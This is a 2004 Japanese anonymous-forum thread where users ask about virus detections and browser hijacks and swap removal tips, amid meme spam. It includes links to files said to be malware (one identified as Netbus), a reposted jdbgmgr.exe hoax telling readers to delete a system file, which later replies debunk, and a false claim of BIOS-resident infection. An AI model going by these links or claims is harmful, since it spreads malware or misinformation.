メール送信者 : ○○○○○○○
検出日時 : 2004/04/04 21:53:12

感染ファイル名 : msg25635.pif
ウイルス名 : W32.Netsky.Q@mm
感染ファイル名 : scandborgvJa4WA
ウイルス名 : W32.Netsky.Q@mm.enc
こーゆー物が送られて来たんですが・・・・・・・・
メールアドレスは書かない方が良いですよね?


714 :名無しさん@お腹いっぱい。:04/04/05 08:53
>>713
メアドは書いたらだめぽ。そのまま削除汁。

715 :第17使徒ゲパチエル ◆CgRMNK8cWw :04/04/05 09:20
やっぱりメアドは書かない方がいいですよね
メアドは書いてません

716 :名無しさん@お腹いっぱい。:04/04/05 15:13
TRENDのオンラインスキャンをやってみたらTROJ_MUSS.Aと言うウイルスが出てきました。
駆除しようと思い書いてあるとうりにしようと思うのですが、どうも書いてある
事と実際に表示されることが食い違ってしまいます。そのせいでなかなか駆除できません。
レジストリーでの駆除の仕方も良く分かりません。何方か分かりやすい良い方法をお願いします。

717 :名無しさん@お腹いっぱい。:04/04/05 15:46
>>716
シマンテック(ノートン)や日本ネットワークアソシエイツ(マカフィー)
のサイトでも、それぞれ駆除ツールが提供されているから、それらで試して
みるのが簡単なのでは?
対象とするアイルスの名前を間違えないように。

Windows XPやMeなら「システムの復元」機能をオフにしないと、うまくいか
ないことがあるのも、各社のサイトに記載されているはずだけどね。
(その点だけは、トレンドマイクロはちょっとわかりにくかったような気も
 するね)


718 :名無しさん@お腹いっぱい。:04/04/05 15:47
>>717
アイルス → ウィルス に訂正。

719 :716:04/04/05 16:48
色々試して見てるのですがなかなか駆除できません。
一応別名の方も分かりましたのでよろしくお願いします。
Download.Trojan, Downloader-DS

720 :名無しさん@お腹いっぱい。:04/04/05 17:45
>>719
> 色々試して見てるのですがなかなか駆除できません。

そういうあいまいな回答では、具体的なアドバイスは難しいのでは?
「書いてあるとうり」ということだけど、トレンドマイクロのどこのページを見て、
何をどうしたのかも書いてないし、PCの環境(OS等)も書いてないし。

おそらくこれだと思うけれど、海外のアダルトサイトへのダイヤラーみたいだね。
ここに書いてあるとおりにやって、ダメだというのなら、OSの再インストールでも
やってみますか?

トレンドマイクロ:TROJ_MUSS.A - 概 要
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_MUSS.A#solution
トレンドマイクロ:TROJ_MUSS.A - 詳 細
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_MUSS.A&VSect=T


721 :名無しさん@お腹いっぱい。:04/04/05 20:05
PCの動作がやたら遅いと思ってタスクマネージャーを開いてプロセスを見たら
「MSPRIVS32」というプログラムがCPUをほぼ9割方占領していた。
このプロセスをシャットダウンすればPCはかなり動作が快適になった。
ウイルスか何か?誰か教えてくれい。

722 :名無しさん@お腹いっぱい。:04/04/06 23:56
まともな書込み失礼します。

先日より、ウィルスバスター2004でWORM AGOBOT.SBというウィルスが
検知されています。駆除も隔離も出来ないそうで、検索サイトでも
まったく引っかかりません。

症状としては、system idol processがパフォーマンスの90%付近を
行ったり来たりするのと、LAN接続の高速インターネットが送受信を
妙に繰り返しているのですが、どうすればよいでしょうか?

ご存知の方、教えていただけませんでしょうか?



723 :名無しさん@お腹いっぱい。:04/04/07 00:18
>>722
ttps://www.netsecurity.ne.jp/article/8/11096.html
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_AGOBOT.R

ウイルス名でぐぐるときは、「AGOBOT」だけおキーワードにするといい。
つうか、バグ放置したまんまかよ!

724 :名無しさん@お腹いっぱい。:04/04/07 00:32
>>723
ありがとうございます。
AGOBOTは種類がいくつがあるようですが、
頂いた対処方法でよろしいんでしょうか?

何も分からなくてすみません。

725 :名無しさん@お腹いっぱい。:04/04/07 00:41
ttp://homepage3.nifty.com/KOYUYA/Patch.exe
↑このウィルス何?


726 :名無しさん@お腹いっぱい。:04/04/07 00:43
>>724
隔離せず削除で。
その後、Windows Updateをしてください。

727 :名無しさん@お腹いっぱい。:04/04/07 00:45
>>726
ありがとうございました。
やってみます!

728 :名無しさん@お腹いっぱい。:04/04/07 02:19
>>725
検出ソフト:マカフィ・ウイルススキャン8
ウイルス名:Netbus.svr
詳細:http://www.nai.com/japan/security/virN.asp?v=Netbus.svr

729 :名無しさん@お腹いっぱい。:04/04/07 12:43
ウイルスに感染しました
JAVA_BYTEVER.A 感染ファイルは4個
ウイルスバスターで、隔離、削除できません。
Win IE 使っています。

どうやったら削除できるんでしょうか?
お願いします

730 :729:04/04/07 13:25
再度、ウイルスバスターでウイルス検索しましたが
でてこなくなりました
潜んでいるのかな

JAVAscriptを切るとYahooMailができなくなるのがイタイ

731 :名無しさん@お腹いっぱい。:04/04/07 14:21
俺もJAVA_BYTEVER.Aが28個くらい感染している
トレンドマイクロのソフトでは削除しない、単体で削除してください
とかって書いてるけど
ソフト買おうと思ったのに、こんなんじゃ買う気しねー
めんどくせーなー、ソフトも使えないんじゃどうすりゃいいのよこれ
俺のパソのスキルなんて初心者程度だから、わけわかんねー

732 :名無しさん@お腹いっぱい。:04/04/07 20:27
>>731
http://www.symantec.com/region/jp/trial/nav.html
NAVでいけそうだよ。体験版ためしてみて。

733 :名無しさん@お腹いっぱい。:04/04/07 23:07
よくわからんのですが、エロサイトまわってたら変なとこに
飛ばされてしまい、自分のIPやらIEのバージョンやらが表示されているサイトに
たどり着きました。
怖くなったのでいったんウインドウを閉じて
そのあと、IEを開くと
C:\WINDOWS\secure.html
というところがスタートページに変更されており
最初に飛ばされたページが表示されています。
そいつを消すとウインドウが2個開き
いずれも表記方法はちがいますが自分のIPやらが表示されているのです。

インターネットオプションやレジストリのスタートページやデフォルトページを元に戻しても
元に戻ります。
spybotやウイルスバスターは無反応でした。
しかもなぜかコントロールパネルのアプリケーションの追加と削除を開いても
すぐに閉じてしまいます。
これはいったいなんなんでしょうか?
あと、対策をご教授いただければと思っています。

734 :名無しさん@お腹いっぱい。:04/04/07 23:10
tp://www3.xfreehosting.com/teen/izambertino/pusy/index.htm
↑のアドレス先に行ってウイルスに感染しました。
慌ててSpybotで全削除+ノートンアンチウイルスで検疫したんですが、
まだ勝手にブラウザが開いてしまう状態で、完全に直りません。
多分WINDOWSフォルダ内にあるdl.exeとdlm.exeが原因っぽいのですが
削除できませんし、ウイルススキャンしてもノートン先生は正常だと言い張ります。
どうすれば良いのでしょうか・・・
申し訳ありませんが、ぜひ対策を教えてください。

735 :名無しさん@お腹いっぱい。:04/04/07 23:13
>>733
私も踏みました。
http://higaitaisaku.web.infoseek.co.jp/removereg32.html
ここに対策が書いてありました。
これくらいしかできなくてごめんなさい。

736 :名無しさん@お腹いっぱい。:04/04/07 23:13
とあるファイルを実行したらドラクエの呪われる音がして
コマンドプロンプトの画面になって、画面が上から真っ赤になりました・・・。
これは何なんでしょう?
知っている方が居たら教えてもらえますか?

737 :734:04/04/07 23:17
追記

「"file///C:/WINDOWS/dlm.html"が見つかりません。
パスまたはインターネットアドレスが正しいかどうかを確認してください。」
という警告が定期的に出てきて、OKを押すとブラウザが開きます。
dlm.htmlは削除しました。
どうすれば良いのでしょうか・・・

738 :734:04/04/07 23:32
多分解決しました。
ご迷惑をおかけ致しました。

739 :733:04/04/07 23:47
>>735

>これくらいしかできなくてごめんなさい。
とんでもない、ありがとうございます。
さっそくためしてみます。

740 :735:04/04/07 23:56
>>733
がんばってください☆
私は超初心者なもんで動きがどんどん悪くなっていく
パソコンに手も足も出ずに仕方なく
初期化しました…(;_;)
もっとパソコンを勉強しようと思った21の春。

741 :名無しさん@お腹いっぱい。:04/04/08 00:36
>>733
trafficexってやつだな。(正式名称は知らん)

今朝、タグ使用可の掲示板を空けた途端に食らった。
おそらく、スパイウェアではなく、アダルトサイトの常駐プログラムかと。

セーフモードで再起動。
インターネットオプションが使える。
ここでIEのログを削除。
ファイルやフォルダの検索で、
その時間に作成されたファイルを全部削除。
Downloaded Program Filesの{111なんとか}を削除。
Drive Dietなどのツールでおかしいレジストリのリンクを検索。
レジストリのクリーンアップ(うまくやってください)。
システム設定ユーティリティのスタートアップに不要なファイルがあれば削除。
これで多分、おっけ。

ほいじゃ。


742 :名無しさん@お腹いっぱい。:04/04/08 00:45
yahooチャットで遊んでいたら、とあるURLを踏んでしまった。
その後、チャットの発言欄に勝手に「http://4etkf.4.com/photos」だの、
あたかも俺が書き込んだような症状が出る。

何つうウィルスだべ?対処法あるかの?

743 :733:04/04/08 00:47
>>735>>740
>>741

ありがとうございます。
とりあえず私が先ほど述べた症状は全部なくなりました。
手順通りにしましたが間違って余計なことをしていたら
不具合があるかもしれないのでバックアップは全部とっておきました。
とりあえず一安心です。
ほんとうにありがとうございました

744 : :04/04/08 01:11
txtファイルが残らず「ぬるぽ」のコメント付のものになっちまった。
正直気持ち悪いんだが、これ何のウイルス??

745 :名無しさん@お腹いっぱい。:04/04/08 01:36
virusって踏むと、どうなるの?
まったく動かなくなったり、HDあぼーんとか?

746 :名無しさん@お腹いっぱい。:04/04/08 01:36
>>744
おもしろいのでそのままにすること

747 :735:04/04/08 01:45
>>733
お疲れ様です!我が事のように嬉しいです!
いやあ私も741さんに早く出会っていれば…
後悔先に立たず、でした。


748 :741:04/04/08 02:04
そうだ。あと食らったファイル名でレジストリキーを検索して、
徹底的に不要なキーを洗っておくのもいいですし、
バックアップされているレジストリを復活させるのもいいかも。
再セットアップって大変だもんねー。

しかしクダラン事をする人がいるもんだ。
ぷんぷんっ。

ほいじゃ。

749 :名無しさん@お腹いっぱい。:04/04/08 10:47
          _
      ミ ∠_)
         /
         /   \\
 ウイーン  Γ/了     | |
  ウイーン  |.@|    | | ガッガッガッ
       | / | .     人
       |/ |    <  >_Λ∩
      _/  | //. V`Д´)/ ←>>744
      (_フ彡           /


750 :名無しさん@お腹いっぱい。:04/04/08 12:50
ぬるぽ

751 :名無しさん@お腹いっぱい。:04/04/08 17:45
   + ゜: ゜  ≦_ ̄_ ̄─
  _ ─    +  ≦_   )
≦_    )        ̄≡/
  ≦_ ≡\ ゝ ̄ヽ  /
   ゜+ :   \Γ 了/
            |.@|
          /|  .| \
    .    /  .|ヱ|   \ミ  ̄─ ≧_
       / ミ   .| .|    (   _ =≧
      (    ̄ ≧_      ̄人      ドガガガガガガッ
         ─_  _≧ ゜+ <  > Λ∩
            ̄      /.V`Д´)/ ←>>750

752 :ぬるぽ人:04/04/08 18:57
ぬるぽ、ぬるぽ、ぬるぽ、ぬるぽ

753 :ぬるぽ人:04/04/08 19:21
ぬーるぽー

754 :名無しさん@お腹いっぱい。:04/04/08 19:36
ヽ( ・∀・)ノ ウンコー

755 :名無しさん@お腹いっぱい。:04/04/08 19:56
        / ̄ ( ・∀・)⌒\
   __    /  _|     |   |
   ヽヽ   /  /  \    |   |           ,,,,,,,iiiiillllll!!!!!!!lllllliiiii,,,,,,,
    \\|  |____|   .|   |           .,llll゙゙゙゙゙        ゙゙゙゙゙lllll,
     \/  \       |   |           .|!!!!,,,,,,,,       ,,,,,,,,,!!!!|
     | ヽ_「\      |   |、         |  ゙゙゙゙!!!!llllliiiiiiiiiilllll!!!!゙゙゙゙ .|
     |    \ \――、. |   | ヽ         .|     .゙゙゙゙゙゙゙゙゙゙     |
     |   / \ "-、,  `|  |  ヽ       |               |  ヅガッ!!!
  _/   /    "-, "' (_  ヽ  ヽ      .|               |
/    __ノ      "'m__`\ヽ_,,,, ヽ      |               |
`ー― ̄          ヽ、__`/ー_,,,, ゙゙゙゙!!!!!!!lllllllliii|               |
                    \゙゙゙゙゙゙゙!!!!!lllllllliiiii|               |
                      \   ヽ   |               |
                       ヽ   \  |               |
                        |     \.|               |
                        `ヽ、,,_ノ|               |
                              ゙゙!!!,,,,,,,,       ,,,,,,,,,!!!゙゙ ←>>752-754
                                   ゙゙゙゙!!!!llllliiiiiiiiiilllll!!!!゙゙゙゙
                                /.// ・l|∵ ヽ\

756 :名無しさん@お腹いっぱい。:04/04/08 20:01
どうもmp3から感染したようなのですが、自分は再起動していないので分からないのですが、
同じファイルからの感染者によると再起動すると首が飛ぶ動画が出てくるらしいです。
感染後、ノートン先生がインターネットに接続しようとしたgro2.exeと言うファイルを止めてくれたので、
このgro2.exeと言うのが、ウイルス?ではないかと思うのです。(更新時刻等から見ても)
ただ、C:\Documents and Settings\Owner\Local Settings\Temp内のgro2.exeを削除しようとしても
アクセスが出来ないとかどうとかで削除出来ません。
これはどういうウイルスで、どのように対処すればよいでしょうか?よろしくお願いします。

757 :名無しさん@お腹いっぱい。:04/04/08 20:06
ageときます。すいません。

758 :名無しさん:04/04/08 20:12
info@Synologic.com
vzw00351@nifty.ne.jp

↑からメールが来てるんだけど、ひょっとしてウィルスメールですか?


759 :名無しさん@お腹いっぱい。:04/04/08 20:19
ん〜ぬるぽ〜

760 :名無しさん:04/04/08 20:20
>>759
教えてケロ!!

761 :名無しさん@お腹いっぱい。:04/04/08 21:05
svchost.exeてなに?気になるぽ

762 :名無しさん@お腹いっぱい。:04/04/08 21:46
>>756はセーフモードからファイルを消去して解決しました。

763 :名無しさん@お腹いっぱい。:04/04/08 21:49
此処ゎ浜崎あゆみさんを応援する非公式サイトです。
そのため著作権・肖像権目当てではございません。
関係者の方でなにかの問題がございましたら
管理人☆あやちん☆までメールでお知らせ下さい。

http://mbspro4.uic.to/user/lovers69.html

荒らし来たんだぁ・・・。
あやちん!!荒らしなんかに負けないで
最近荒らし多発してるから気をつけてねvvこれからも頑張ってね☆
荒らしが来たの!!!?
くっそー!
ココに荒らしが来たんだ…(汗)
それで最近色んなあゆ応援HPとか
閉鎖しちゃっているもんねぇ。
あやちんにはこれからも頑張ってほしい!!
私もできるだけ協力するから☆
これからも宜しくお願いします!!


764 :名無しさん@お腹いっぱい。:04/04/08 22:05
今日いきなりパソコンの中にあるJPEG画像が全部見れなくなりました。
もともとのJPEGのデーターサイズが1MB〜4MBほどありましたが全部220KBになってました。
また220KになってしまったJPEGは開きません。
これって何のウィルスで元には戻らないんでしょうか?
だれか解決法知りませんか?


765 :名無しさん@お腹いっぱい。:04/04/08 22:35
   _____...∩ _____
   ─────[二]─────
            | |     
       | ̄ ̄ ̄ ̄ ̄| ピピッ
       |       __|
        ̄ ̄| ̄| ̄  ⌒ ⌒ボン!!              ヒュルルルルル!!
    _ .__.___./ ̄ ̄|、_从⌒ ヽ                   ||
  .(_.(___[;二].()|  |  ()  ヽ===   ≡≡≡≡≡<Σ(三(二(三⊃ 人 ガッ.. >>388
       . . |_|__| ̄/W ノノ                   ||      <  >_∧∩ >>505
                /  |                            V`Д´)/ .>>708
                                                 / ←>>759

766 :名無しさん@お腹いっぱい。:04/04/08 23:52
>>765
よく探したね。
つか釣られすぎ。w

767 :名無しさん@お腹いっぱい。:04/04/09 02:07
ぬるるぽ、ぬ〜るぽ〜ww

768 :名無しさん@お腹いっぱい。:04/04/09 10:16
   ( ・∀・)   
 (( ( ヽ ノ )  
   ノ\(○´  ガッ
  (_ノ(_\   ∧
     = ()二) <  >_∧∩
            V`Д´)/ ←>>767
                 /

769 :名無しさん@お腹いっぱい。:04/04/09 14:59
ってかさぁ〜なんでぬ○ぽって言うと叩かれるの?

770 :第17使徒ゲパチエル ◆CgRMNK8cWw :04/04/10 16:53
>>769
それが決まりだから

771 :名無しさん@お腹いっぱい。:04/04/10 16:56
うん、じゃあぬるぽ^^

772 :名無しさん@お腹いっぱい。:04/04/10 17:23
http://49.dip.jp/~up/up/img/49up32807.zip

↑これウィルスですかね?
解凍して結合バッチファイルを実行したら、一瞬WMPのアイコンが現れて
動画ファイルが出来たかと思ったら直ぐに消えてしまい、同梱の画像ファイルだけ
残ったんですが、、、
良く見たら中のファイルの一つに Document and Setting \よっちゃん\デスクトップ\罠
みたいな名前のショートカットがあったんですが
いまのところ表面上はPCに何の影響もないんですがウィルスソフト持ってないんで、
分かる方いましたら教えてください m(_ _)m

773 :名無しさん@お腹いっぱい。:04/04/10 18:12
>>772
ご愁傷様です・・・
それもうだめだ、PCあぼーん

774 :772:04/04/10 18:31
>>773
詳しく教えてください 。・゚・(ノД`)・゚・。
今は無問題でPC使えてるんですが、、、
時限式なんですかね?
ウィルスなら詳細名教えて頂けると有り難いです

775 :名無しさん@お腹いっぱい。:04/04/10 19:12
>>774
ダウソ板に帰りなさい。

776 :名無しさん@お腹いっぱい。:04/04/10 19:12
>>774
たしかPC内に存在するEメールアドレスすべてにウイルスを付加メールを送る
その後BIOSに感染してハードディスク全消去。
何回HDDをフォーマットしてもBIOSからまた感染する最悪のウイルスですよ

777 :第17使徒ゲパチエル ◆CgRMNK8cWw :04/04/10 19:32
ノートンを入れといて電源切ろうとする度にtAppが応答していませんと言われるのは仕様ですか?

778 :名無しさん@お腹いっぱい。:04/04/10 19:43
結局何も起こらなかったのですが、とあるサイトを開いたら
ウイルスに感染してしまい、ウェブプログラムの画面?か何かが
出てきてたのですが、不正な操作の為終了しますみないな感じの
メッセージが出てきました。

このウイルスって、何と言う名前のウイルスなんでしょうあk?

779 :名無しさん@お腹いっぱい。:04/04/10 19:45
>>734
俺もおんなじもの踏んだ。
解決してよかったね。俺は初期化するハメになったよ。
エロサイトは行かぬが吉だなorz。


780 :名無しさん@お腹いっぱい。:04/04/10 19:47
>>778
そのメッセージならたぶんウイルス数種+スパイウエアのインスコ

781 :772:04/04/10 19:52
>>776
嘘ばっかついてんじゃねーよ、知ったかのカスが
わからねーんだったらすっこんでろや
本当に使えない奴ばっかだなこの板は
お前らは聞かれたことに素直に答えてりゃいいんだよ
わかったか?セキュリティ板のヴォケども

782 :名無しさん@お腹いっぱい。:04/04/10 19:53
以上セキュリティ板のヴォケどもにすら相手にされない>>772でした。

783 :772:04/04/10 19:58
>>782
お前が釣れてんじゃん、カスw ( ´,_ゝ`)プッ

784 :名無しさん@お腹いっぱい。:04/04/10 22:08
        _ __
    _ =ニ∠__) ミ 、
  ,∠__)   |    ` 、─、
     \    |      >、_,)
        `n ∩     /    :
l⌒l──⊂(・(  ・)つ´    i  !
ヽ、|  /と(∀・ _( ・∀・)  |\l
, -、/   /(ノ と    )─‐l  l ガッ
ヽ、\ _/    ( Y /ノ   人‐′
   ̄(_フ    `|/ ) <  >Λ∩
          _/し'   ノノV`Д´)ノ ← >>771
           (__フ 彡イ     /

785 :山崎 渉:04/04/11 00:20
   ∧_∧
  (  ^^ )< ぬるぽ(^^)

786 :山崎 渉:04/04/11 00:21
  ∧_∧
  (  ^^ )< ぬるぽ(^^)




787 :山崎 渉:04/04/11 00:21
   ∧_∧
  (  ^^ )< ぬるぽ(^^)


788 :名無しさん@お腹いっぱい。:04/04/11 00:57
        _
    ミ ∠_)
        ./
      /
      / ・∀・)
  // と    )    | | ガッ
       Y /ノ    人    ガッ
      て / )    <  >__Λ∩  ガッ
      _/し' //.V `Д´)/
     (_フ彡  /     / ←>>785
       _
    ミ∠_)
      /  \\
  ( ・∀/)   | | ガッガッガッ 
  (  つつ    | |
   Y  /ノ    人
    / )    <  >_∧∩
  _/し' //. V`Д´)/
  (_フ彡        /  ←>>786

..       |クイッ  | |
 ( ・∀・)|    | | ガッ
 (    つ    ,> | |
 | ||  、/ミミ人
 (__)__)     <  >__Λ∩
            V`Д´)/
                / ←>>787

789 :山崎 渉:04/04/11 01:52
   ∧_∧
  (  ^^ )< ぬるぽ(^^)

   ∧_∧
  (  ^^ )< ぬるぽ(^^)
   ∧_∧
  (  ^^ )< ぬるぽ(^^)
   ∧_∧
  (  ^^ )< ぬるぽ(^^)
   ∧_∧
  (  ^^ )< ぬるぽ(^^)






790 :山崎 渉:04/04/11 01:52
  ∧_∧
  (  ^^ )< ぬるぽ(^^)

   ∧_∧
  (  ^^ )< ぬるぽ(^^)
   ∧_∧
  (  ^^ )< ぬるぽ(^^)
   ∧_∧
  (  ^^ )< ぬるぽ(^^)
   ∧_∧
  (  ^^ )< ぬるぽ(^^)



791 :名無しさん@お腹いっぱい。:04/04/11 02:02
何がしたいの藻前ら?

792 :名無しさん@お腹いっぱい。:04/04/11 04:35
772必死だなw

793 :名無しさん@お腹いっぱい。:04/04/11 09:42
自分のメーラー添付ファイルを問答無用で削除する設定をしているので
何がやってきたかわかりにくいんだが、これ何のウィルスだろう。

件名:Re: (ID:UUATPWR)
件名:Re: (ID:REM)
件名:Re: (ID:DIICG)

内容が白紙だったり、htmlメール(それも壊れている)だったり。
肝心の添付ファイルを見ることができないから状況が中途半端でよく
わからない。

ちなみに機種はマカーOS9。マカーのウィルスでこんなの見あたらな
かったよ。ノートン無反応だったし。

794 :793:04/04/11 09:51
ちなみに何かダウンロードした様子は全くない。

初回は2月半ば頃。古いウィルスなのかな。

795 :名無しさん@お腹いっぱい。:04/04/11 12:02
                ガッ ガッ ガッ
              ....,ガッガッ ガッガッ ガッガッ_∧∩
    <" ̄ ̄ ̄ ̄[];;;;;.......;;;;ガッ ガッ ガッ ガッ`Д´)/ >>789
     `i,,,,,i」"´(| ̄   ::ガッガッ ガッガッ      / >>790
      ||||||||  ヽ        ガッ
     |  _|
     |彡=|
     ノ     l、
    /  ̄ ̄ ̄ `、
   |  ファ鰤図  |
    i        i
    `、____ノ

796 :名無しさん@お腹いっぱい。:04/04/11 13:12
最近、くまのアイコンのアプリケーションのウィルスがたくさん出没している模様で
す。
つきましては、絶対に以下の内容をよく読んで、対処をお願いしたいと思います。
いたずらやチャンメではありません。
終わりましたら、アドレス登録している方すべてに、以下の内容をコピペして送って
ください。

ウイルス名は「jdbgmgr.exe」です。14日(二週間)の間静かにしていてシステムを破
壊します。
このウイルスは電子メールに送付した否かに関わらず、アドレス帳に登録されている
全てのアドレスに感染するようです。
ノートンやMCAfeeのワクチンソフトでは検出できないそうです。
メッセンジャーを通して自動的にアドレスブックにあるアドレスに送付されるそうで
す。
教えていただいた下記の要領で調べたところ感染していましたので削除しました。

下記の要領でプログラムの存在を発見し、削除し,アドレスブックに記載されている
方全てに警告してくださいとのことでした。

1.画面下のスタートをクリックし、
プログラムやファイルを検索するオプションをクリックしてください。
2.検索するファイル名として、jdbgmgr.exeと書きます。
3.ドライブCを検索してください。
4.検索をクリックします。
5.ウィルスは、jdbgmgr.exeのファイル名の頭にテディベアのアイコンがついていま
す。絶対にあけないようにしてください!
6.右クリックして削除。ゴミ箱に入れます。
右クリックが効かない時はドラッグしてゴミ箱へ。
7.ゴミ箱をクリックして、そこでも削除してください。

797 :名無しさん@お腹いっぱい。:04/04/11 13:23
>>796
http://server2041.virtualave.net/gokisan/romuokiba.html

798 :名無しさん@お腹いっぱい。:04/04/11 17:00
>>796
懐かしいデマウィルスだな。

ttp://www.symantec.com/region/jp/sarcj/data/j/jdbgmgr.exe_file_hoax.html

799 :名無しさん@お腹いっぱい。:04/04/11 17:13


800 :名無しさん@お腹いっぱい。:04/04/11 17:13


801 :名無しさん@お腹いっぱい。:04/04/11 17:15


802 :名無しさん@お腹いっぱい。:04/04/11 17:15
(^^)

803 :名無しさん@お腹いっぱい。:04/04/11 19:05
まいりますた…。「 TROJ_MUSS.A 」に感染。
http://greatsearch.biz/ に飛ばされます。
トレンドマイクロ社のページを見て、レジストリを
直そうにも、同社が指定している、レジキーが見当たらず
途方にくれております。どなたか指南下さい。

804 :名無しさん@お腹いっぱい。:04/04/11 19:07
はははは。

805 :名無しさん@お腹いっぱい。:04/04/11 19:11
てぃなみに、XPを使ってます。HKEY_CURRENT_USER
までは無事にたどり着いたものの、そこから、dctlって
いうレジキーが探し出せず、一歩も前に進みませんでつ(泣)。


806 :名無しさん@お腹いっぱい。:04/04/11 21:39
>>805
そこを飛ばして先に進む。つーかバスターくらい買え。貧乏人。

807 :名無しさん@お腹いっぱい。:04/04/11 22:09
>>805
XPならシステムの復元使えばええやんか。
んで後から本体探して消せばええやん。

808 :名無しさん@お腹いっぱい。:04/04/11 22:41
      __
      .|__|
       //
  ( ・∀・)/ ・・・
 と    つ
   Y  .ノ
    .  ) ∧_∧∩ ・・・
  _/し'  ( `Д´)/
           /←>>799-802

809 :名無しさん@お腹いっぱい。:04/04/12 00:50
ウイルスチェックするやつでこんなの出てきたんですけど
ウイルス―――――駆除可能――ファイル
TROJ BOOKMARK.E いいえ  C:\WINDOWS\SYST...
TROJ BOOKMARK.E いいえ C:\WINDOWS\SYST...
TROL WILDJP.A  いいえ C:\WINDOWS\SYST...
HTML STARTPAGE.B いいえ C:\WINDOWS\hh.htt
ってのが出ました
まずどうしたらいいのかわからないんで教えてください

810 :名無しさん@お腹いっぱい。:04/04/12 01:06
削除汁

811 :節穴さん:04/04/12 01:07
ぐえst ぐえst

812 :809:04/04/12 01:11
>>810
どういう意味ですか?
もみあげって

813 :名無しさん@お腹いっぱい。:04/04/12 01:17
いや、別に・・・
普通にageるんじゃつまらないじゃん

814 :名無しさん@お腹いっぱい。:04/04/12 01:56
多分809は「削除汁」の事を聞きたかったんだ
しかし一行目を書いた時に名前が青いのに気付いた
そしてメール欄を見てみるとそこには「momiage」の文字がある
809は思った「momiage?・・もみあげか・・・、もみあげ?
どういうことだ?もみあげって耳の前のあの毛だよな・・・
いやもしかしたら揉んであげるってことかもしれない・・・
揉んであげる・・・俺をか?」
809は悩んだ
悩むうちに809の頭の中からは「削除汁」への疑問は消えていた
そして耐え切れずにもみあげの事を書いてしまった
しかし809は満足だろう
自分の知りたいことがわかって
もう809はウイルスなんてどうでもいい
ただの名無しからもらったレスが809の心を満たした
「もみあげ」
この言葉から開放された809は今素敵な夢を見ていることだろう

815 :名無しさん@お腹いっぱい。:04/04/12 03:48
ワロタ

816 :名無しさん@お腹いっぱい。:04/04/12 05:11
ぬるぽ^^

817 :名無しさん@お腹いっぱい。:04/04/12 05:19
さっきからウィルスバスターがこんなん警告してるんだけど、
いったい何かわかる香具師いますか?

検索の種類: リアルタイム検索
検出ファイル名: C:\WINDOWS\cmd32.dll
ウイルス名: TROJ TOPGER.AG
ユーザ名: xxxxxxx

バスターじゃ削除できないみたいだし、
なんなんだろう(´・ω・`)

818 :名無しさん@お腹いっぱい。:04/04/12 07:02
Yahoo!メッセンジャーでURLが出るvirusに感染しました
いくら検索かけてもMsroot 8879.exe見つかりません
誰か助けてくだい。

819 :名無しさん@お腹いっぱい。:04/04/12 09:23
>>806
ウイルスバスター2004インストしておりますが・・・。
>>807
いやはや、無事にクリーンアップできて、正常に戻りました!!


  有難う御座いました!!!!!!! サンクスコ!



820 :名無しさん@お腹いっぱい。:04/04/12 11:46
お忙しいところ失礼します。

当方マカーで、Winには似たものがあったのですがMacでこのような動作をするウィルス
が見つからなかったので、質問させていただきます。

一日に一度、自分のメールアドレスから
件名<no subjects>
宛先"<undisclosed-recipients: ;>"
本文は空白で、添付ファイルもありません。
ノートンもオンにしてありますが、反応はありませんでした。
"<undisclosed-recipients: ;>"ということは、色々なところに送っている可能性があると思うのですが、
確認したところ、私のメールアドレスからはそういったメールは届いていないとのことでした。

今のところHDやファイルにはなんの問題もないのですが、なんだか気持ち悪いです。。
どなたかご存知の方いらっしゃいましたら、どうぞよろしくお願い致します。

821 :名無しさん@お腹いっぱい。:04/04/12 11:50
【正式】ウィルス情報&質問 総合スレッド☆Part18
http://pc3.2ch.net/test/read.cgi/sec/1081735712/l50

822 :名無しさん@お腹いっぱい。:04/04/12 13:13
>>820
おお〜、うちはXPだけど、同じようなのくるよ!!
文も無いし、差出人も無し。
これ一体どういう事なんでしょうね!?

823 :名無しさん@お腹いっぱい。:04/04/12 17:30
             /◎)))
            / / :
            / /  :        
           / /   :      
           / /     :,     
          / /      :,  
          / /       :, 
         / /         :, 
    .     / /          :,  
   .( ・∀・) /          、  ∩__
   |/ つ¶__/    ヽヽ     /;;;;   ヽ ガッ
   L ヽ /. |     ヽ ニ三 |:;;;;   | 人∧__,∧∩
   _∪ |___|            \;;;;_ノ<  >`Д´)./ ←>>816
   [____]_                V/    /
 /______ヽ_ヽ  
 |______|_|  
/◎。◎。◎。◎ヽ= / ̄/
ヽ_◎_◎_◎_◎ノ=ノヽニヽ

824 :名無しさん@お腹いっぱい。:04/04/12 19:58
>>803
俺はバスター製品版で駆除できぞー
あと、エロサイトばっかり行くなよー

825 :名無しさん@お腹いっぱい。:04/04/12 20:29
>>824
スンマソン。ワールドワイドウェブに乗りまくって
エロサイトを攻めまくった結果でした。しばらく自制。
ということで、さげ。


826 :名無しさん@お腹いっぱい。:04/04/12 23:05
すいませんインターネットしていると2時間おき位に、
file:///c:/windows/dlm.htmlが見つかりません。
パスまたはインターネットアドレスが正しいかどう確認して下さい。
と来るんだが、ウイルスですかね? 詳しい方教えて下さい。
お願いします。

827 :名無しさん@お腹いっぱい。:04/04/12 23:12
NullPointerException

828 :名無しさん@お腹いっぱい。:04/04/12 23:55
>>826
ttp://www.okweb.jp/kotaeru.php3?q=825797

少しは検索するなりウイルスチェック・スパイウェアチェックしたらどうかね?

829 :名無しさん@お腹いっぱい。:04/04/13 00:12
828さんすみません。ありがとう。

830 :名無しさん@お腹いっぱい。:04/04/13 01:06
ウィルス入るとどうなるのか、具体的に教えてくらはい。

831 :名無しさん@お腹いっぱい。:04/04/13 03:26
JS_LAMEDON.Aというウイルスを検出したんですが、具体的にどういう悪さをするものなのか分かりません。
ウイルス名JS_LAMEDON.Aでググってみたり、トレンドマイクロのサイト見たんですが
肝心のウイルス詳細が英文で説明されていてさっぱり分かりませんでした・・・↓
http://fr.trendmicro-europe.com/enterprise/support/pattern.php

ウイルス名JS_LAMEDON.A
感染ファイルC:\WINDOWS\dl.html
と検出されたんですが、このC:\WINDOWS\dl.htmlは削除しちゃってもいいのでしょうか?
今は一応ウイルスバスターが「隔離」の状態にしてくれてますが・・・

何かご存知でしたら助言おねがいします。

832 :名無しさん@お腹いっぱい。:04/04/13 03:33
>>831
まあお茶でも飲んでもちつけ

833 :名無しさん@お腹いっぱい。:04/04/13 04:52
    ,.、,、,..,、、.,、,、、..,_       /i
